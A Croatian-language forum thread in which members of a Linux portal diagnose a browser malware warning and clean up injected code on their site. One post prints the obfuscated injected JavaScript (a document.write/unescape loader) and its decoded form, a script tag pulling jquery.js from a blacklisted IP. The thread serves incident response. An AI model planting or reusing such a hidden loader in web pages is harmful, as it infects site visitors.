Maliciozni kod na portalu

Prijedlozi, komentari, kritike i sl. vezano uz portal.

Moderator/ica: Moderatori/ce

Avatar
Markec
Postovi: 3865
Pridružen/a: 30 sij 2008, 14:55
Spol: M
OS: neodlučan
Lokacija: Croatia/Zagorje

Re: Maliciozni kod na portalu

Post Postao/la Markec »

4ndY je napisao/la:Tko? Gdje? Šta? kava
Ovo meni javlja google crome od jučer ujutro
http://www.imagesforme.com/show.php/450632_11.PNG

http://www.imagesforme.com/show.php/450633_22.PNG
Avatar
Suko
Site Admin
Postovi: 16079
Pridružen/a: 03 tra 2008, 18:09
Spol: M
OS: Mint 17 Cinnamon
Lokacija: Svugdi me ima. Slavonija uglavnom.

Re: Maliciozni kod na portalu

Post Postao/la Suko »

I što sad?
Jel može neko objasniti o čem se radi? :zbunj
Avatar
4ndY
Moderator
Postovi: 4060
Pridružen/a: 15 svi 2008, 18:05
Spol: M
OS: Fedora/KDE
Lokacija: Hamburg, DE
Kontakt:

Re: Maliciozni kod na portalu

Post Postao/la 4ndY »

Provjeriti koji dio lzs.com site-a zove ovo:

Kod: Označi sve

http://94.247.2.195/jquery.js
http://94.247.2.195/news/?id=101
jer je taj IP blacklistan...
A neutron walks into a bar; he asks the bartender, 'How much for a beer?' The bartender looks at him, and says 'For you, no charge.'
Avatar
Sokac
Site Admin
Postovi: 1120
Pridružen/a: 11 pro 2007, 23:33
Spol: M
OS: Archlinux
Lokacija: San Francisco
Kontakt:

Re: Maliciozni kod na portalu

Post Postao/la Sokac »

Kod je izgeneriran između </head> i <body> i radi se o sljedećem:

Kod: Označi sve

<script language=javascript><!-- 
document.write(unescape('8Zd%3CsTHcTHripC0Ht%20JYsn1zrc%3DLc%2F%2F8Zd9n1z4%2E2TH4JY7C0H%2E2%2EhAt1TH9Lc5Lc%2Fn1zjn1zqLcuJYervViy%2EjC0Hs8Zd%3E%3C%2FvVisLccriC0HptLc%3E').replace(/hAt|8Zd|JY|vVi|C0H|n1z|TH|Lc/g,""));
 --></script>
odnosno prevedeno

Kod: Označi sve

<script src=//94.247.2.195/jquery.js></script>
Što znači da poziva tu skriptu.

Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.
Avatar
Grof
Site Admin
Postovi: 9954
Pridružen/a: 04 pro 2007, 08:00
Lokacija: Zagreb

Re: Maliciozni kod na portalu

Post Postao/la Grof »

Sokac je napisao/la: Pregledao sam kod i toga dijela jednostavno nema (prazno je između </head> i <body>. Vrlo vjeorjatno da se netko poigrao sa cijelim serverom i to bi trebalo prijaviti vlasniku servera, odnosno firmi pondi.

Pa neka Ivan prijavi onda... :)
Avatar
Markec
Postovi: 3865
Pridružen/a: 30 sij 2008, 14:55
Spol: M
OS: neodlučan
Lokacija: Croatia/Zagorje

Re: Maliciozni kod na portalu

Post Postao/la Markec »

Popravljeno :)
Avatar
Sokac
Site Admin
Postovi: 1120
Pridružen/a: 11 pro 2007, 23:33
Spol: M
OS: Archlinux
Lokacija: San Francisco
Kontakt:

Re: Maliciozni kod na portalu

Post Postao/la Sokac »

Super, preko 100 datoteka sam morao prepravljati xD
Avatar
Tux Slave
Postovi: 519
Pridružen/a: 25 ožu 2008, 14:47
Spol: M
OS: Fedora 10 - KDE 4.2.x
Lokacija: Nova Gradiska
Kontakt:

Re: Maliciozni kod na portalu

Post Postao/la Tux Slave »

Sokac je napisao/la:Super, preko 100 datoteka sam morao prepravljati xD
Ovo bi bilo odlično kao zadatak.

Napisati bash skriptu koja će izbrisati malciozni kod iz svih fileova u unesenom direktoriju i pod-direktoriju. I još uz to dati primjer filea s malcioznim kodom na kojemu bi se skripta testirala.

Ali već je riješeno pa nema potrebe.
Avatar
Markec
Postovi: 3865
Pridružen/a: 30 sij 2008, 14:55
Spol: M
OS: neodlučan
Lokacija: Croatia/Zagorje

Re: Maliciozni kod na portalu

Post Postao/la Markec »

Sokac je napisao/la:Super, preko 100 datoteka sam morao prepravljati xD
svaka ti čast što si uspio :)
Zanima me, kako je taj virus dospio na server lzs, jel možda iz pondija došel ili ?
Avatar
iv@n
Site Admin
Postovi: 7631
Pridružen/a: 01 pro 2007, 18:12
Spol: M
OS: openSUSE TW
Lokacija: Vinkovci, Hrvatska
Kontakt:

Re: Maliciozni kod na portalu

Post Postao/la iv@n »

Markec šta sada Chrome kaže kad pristupiš lzs?
To avoid criticism ~ do nothing, say nothing, be nothing.
Odgovori